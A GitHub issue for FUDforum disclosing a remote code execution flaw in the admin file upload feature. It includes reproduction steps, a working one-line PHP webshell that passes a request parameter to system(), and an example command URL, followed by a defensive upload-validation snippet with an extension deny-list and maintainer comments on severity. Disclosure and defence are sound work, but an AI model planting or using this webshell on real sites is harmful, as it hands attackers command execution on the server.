fudforum / FUDforum

FUDforum is a super fast and scalable discussion forum. It is highly customizable and supports unlimited members, forums, posts, topics, polls & attachments. It can import XML Feeds and sync with USENET groups and Mailing Lists (bi-directional).
http://fudforum.org/

Remote code execution bug #23

Open SonNguyen3496 opened 2 years ago

SonNguyen3496 commented 2 years ago

Remote code execution via the File Administration System feature in the Admin Control Panel

Affected version: 3.1.0

Demo installation: https://localhost/FUDforum-3.1.2/

Steps to reproduce the bug:

1. Go to http://localhost/FUDforum-3.1.2/ and log in with an admin account.

2. Go to the Admin Control Panel and open http://localhost/FUDforum-3.1.2/adm/admbrowse.php?&SQ=59a844c7073e3a8d98026d324884a119

3. Use the file upload feature in the File Administration System to upload a PHP webshell to the webroot directory. Webshell payload:

```php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
```

4. Access the webshell to get remote code execution. Example: http://localhost/FUDforum-3.1.2/2test1.php?cmd=ls%20-la
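One mitigation an admin file-upload handler could apply against the report above, as an added example that is not FUDforum's own code (the constants and `validate_admin_upload()` are assumed names): refuse script extensions and confine the destination to an upload directory that the web server does not execute.

```php
<?php
// Added example (not FUDforum's code): validate an admin file-manager upload
// before it is written to disk. ALLOWED_UPLOAD_ROOT, DENIED_EXTENSIONS and
// validate_admin_upload() are assumed names.

// Directory uploads may land in. Assumed to exist and to be served with PHP
// execution disabled (no script handler mapped for it).
const ALLOWED_UPLOAD_ROOT = '/var/www/forum/uploads';

// Extensions a typical web server may hand to a script engine; deny them.
const DENIED_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'phps', 'pht',
    'shtml', 'cgi', 'pl', 'htaccess',
];

/**
 * Returns the canonical destination path if the upload is acceptable,
 * or throws a RuntimeException saying why it was rejected.
 */
function validate_admin_upload(string $originalName, string $targetDir): string
{
    // Drop any directory component the client supplied.
    $base = basename($originalName);
    if ($base === '' || $base[0] === '.') {
        throw new RuntimeException('Rejected: empty or dot-prefixed filename');
    }

    // Check every dotted segment, so "shell.php.txt" is caught as well as "shell.php".
    foreach (array_slice(explode('.', strtolower($base)), 1) as $ext) {
        if (in_array($ext, DENIED_EXTENSIONS, true)) {
            throw new RuntimeException("Rejected: executable extension .$ext");
        }
    }

    // Canonicalise the target directory and confirm it sits inside the upload root.
    $root = realpath(ALLOWED_UPLOAD_ROOT);
    $dir  = realpath($targetDir);
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($root === false || $dir === false
        || strncmp($dir . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('Rejected: target directory is outside the upload root');
    }
    return $dir . DIRECTORY_SEPARATOR . $base;
}

// Usage in an upload handler (assumed form fields "f" and "dir"):
// $dest = validate_admin_upload($_FILES['f']['name'], $_POST['dir']);
// move_uploaded_file($_FILES['f']['tmp_name'], $dest);
```

The extension deny-list only covers what the web server would execute; keeping the upload root out of the document root (or mapping no script handler to it) is what makes the check robust.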
babywofl666 commented 2 years ago

Confirmed, that is critical impact!

naudefj commented 2 years ago

It needs to be fixed, but it's not critical, as it requires admin access. A forum admin is unlikely to hack his/her own forum.

SonNguyen3496 commented 2 years ago

Agree with you.